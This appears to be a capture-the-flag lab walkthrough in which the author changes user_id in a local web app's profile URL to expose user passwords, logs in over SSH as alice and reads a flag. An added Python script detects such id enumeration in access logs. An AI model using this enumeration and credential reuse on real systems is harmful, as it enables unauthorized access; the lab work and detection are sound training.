Change id=xx in the URL:
http://192.168.227.133/index.php?page=profile&user_id=1

Id=1   Name: Eweuh Tandingan   Username: eweuhtandingan   Password: skuyatuh
Id=2   Name: Aing Maung   Username: aingmaung   Password: qwerty!!!
Id=3   Name: Sunda Tea   Username: sundatea   Password: indONEsia
Id=4   Name: Sedih Aing Mah   Username: sedihaingmah   Password: cedihhihihi
Id=5   Name: Alice Geulis   Username: alice   Password: ic3
Id=6   Name:   Username:   Password:
Id=7   Name:   Username:   Password:
Id=8   Name:   Username:   Password:
Id=9   Name: Abdi Kasep   Username: abdikasepak   Password: orrrrr
Id=10  Name:   Username:   Password:
Id=11  Name:   Username:   Password:

The Id=5 entry should be the account and password for the SSH connection; according to the lab description, we should be looking for a user named alice.
ssh alice@192.168.227.133
Password: 4lic3
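Seen from the defender's side, the user_id walk at the start of this step leaves a clear trace in the web server's access log: one client loading page=profile for many different user_id values. The Python sketch below is an added example, not part of the original walkthrough; the log lines are constructed, and the combined-log format, client addresses and threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (Apache combined-log style is an assumption;
# client addresses and timestamps are made up for this example).
SAMPLE_LOG = """\
192.168.227.1 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=profile&user_id=1 HTTP/1.1" 200 512
192.168.227.1 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=profile&user_id=2 HTTP/1.1" 200 509
192.168.227.1 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=profile&user_id=3 HTTP/1.1" 200 507
192.168.227.1 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=profile&user_id=4 HTTP/1.1" 200 515
192.168.227.1 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=profile&user_id=5 HTTP/1.1" 200 498
192.168.227.50 - - [01/Jan/2024:10:03:10 +0000] "GET /index.php?page=login HTTP/1.1" 200 730
192.168.227.50 - - [01/Jan/2024:10:03:20 +0000] "GET /index.php?page=profile&user_id=12 HTTP/1.1" 200 501
192.168.227.50 - - [01/Jan/2024:10:05:41 +0000] "GET /index.php?page=profile&user_id=12 HTTP/1.1" 200 501
"""

# client, ident, user, [timestamp], "METHOD target PROTO"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')


def profile_ids_by_client(log_text):
    """Map each client address to the set of user_id values it requested
    on page=profile."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        client, target = m.groups()
        query = parse_qs(urlsplit(target).query)
        if query.get("page") != ["profile"]:
            continue
        for uid in query.get("user_id", []):
            if uid.isdigit():
                seen[client].add(int(uid))
    return dict(seen)


def flag_enumeration(log_text, max_distinct=2):
    """Return clients that loaded more distinct profiles than max_distinct.
    A logged-in user normally loads only their own profile, so a client
    touching many ids is worth a look. The threshold is an assumption."""
    return {client: sorted(ids)
            for client, ids in profile_ids_by_client(log_text).items()
            if len(ids) > max_distinct}


if __name__ == "__main__":
    print(flag_enumeration(SAMPLE_LOG))
```

Detection only tells you it happened; the fix is for the server to check that the requested user_id belongs to the logged-in session before returning the profile.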
ls -alh
ls -l .my_secret/
cat .my_secret/flag1.txt
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

Next, escalate privileges. Check which commands the current user can run with sudo.